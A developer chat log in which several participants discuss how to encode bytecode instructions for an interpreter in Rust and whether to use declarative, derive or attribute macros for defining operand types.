| OpCode | Flag   |      Arg0      | Flag   |      Arg1      | Flag   |       Dest     |

#

The flag would tell it what the argument is, so if it's a register, a const id, a local id, etc.

sturdy sequoia Jan 24, 2024, 5:18 PM

#

tight glade Sounds like you maybe need zero abstraction types to handle that complexity and ...

yes that's what I would do

tight glade Jan 24, 2024, 5:19 PM

#

That should reduce the need for a macro then right?

sturdy sequoia Jan 24, 2024, 5:19 PM

#

tight glade That should reduce the need for a macro then right?

Not really, because creating all of the builders etc. would be a giant chore

tight glade Jan 24, 2024, 5:20 PM

#

Maybe simpler macros here can help? 😅😇

#

Seems like we're moving the complexity around 😅

sturdy sequoia Jan 24, 2024, 5:21 PM

#

I mean I could do one macro per instruction and then a big macro that takes all of the other ones in

tight glade Jan 24, 2024, 5:21 PM

#

🤷‍♀️

sturdy sequoia Jan 24, 2024, 5:22 PM

#

like:

instruction! {
  struct Add -> Register | Local {
    lhs: Register | Constant | Local | Global | Param | Capture,
    rhs: Register | Constant | Local | Global | Param | Capture,
  }
}

tight glade Jan 24, 2024, 5:23 PM

#

That's like the same thing to be honest 😂

sturdy sequoia Jan 24, 2024, 5:23 PM

#

Then I can do something like:

impl Exec for Add<'_> {
  fn exec(self, cf: &mut ControlFlow) -> StrResult<...> {
    ops::add(self.lhs(), self.rhs()
  }
}

glad urchin Jan 24, 2024, 5:23 PM

#

I think you can still use macros, i just think you don't need to make everything a macro

tight glade Jan 24, 2024, 5:23 PM

#

Oh!

glad urchin Jan 24, 2024, 5:23 PM

#

sturdy sequoia Then I can do something like: ```rs impl Exec for Add<'_> { fn exec(self, cf: ...

E.g. this could be a derive macro

#

It would be much more readable too

tight glade Jan 24, 2024, 5:24 PM

#

sturdy sequoia Then I can do something like: ```rs impl Exec for Add<'_> { fn exec(self, cf: ...

That does sound nice

sturdy sequoia Jan 24, 2024, 5:25 PM

#

glad urchin E.g. this could be a derive macro

no, because I can't do custom syntax for the multiple input types and I can't easily specify the output type

glad urchin Jan 24, 2024, 5:27 PM

#

Huh?

sturdy sequoia Jan 24, 2024, 5:27 PM

#

glad urchin Huh?

I need to specify the multiple different types that an input can take

#

additionally, I also need to specify its output type

#

a derive macro cannot do that

#

an attribute macro could

glad urchin Jan 24, 2024, 5:28 PM

#

sturdy sequoia additionally, I also need to specify its output type

Where would this be used? In the field types?

#Performance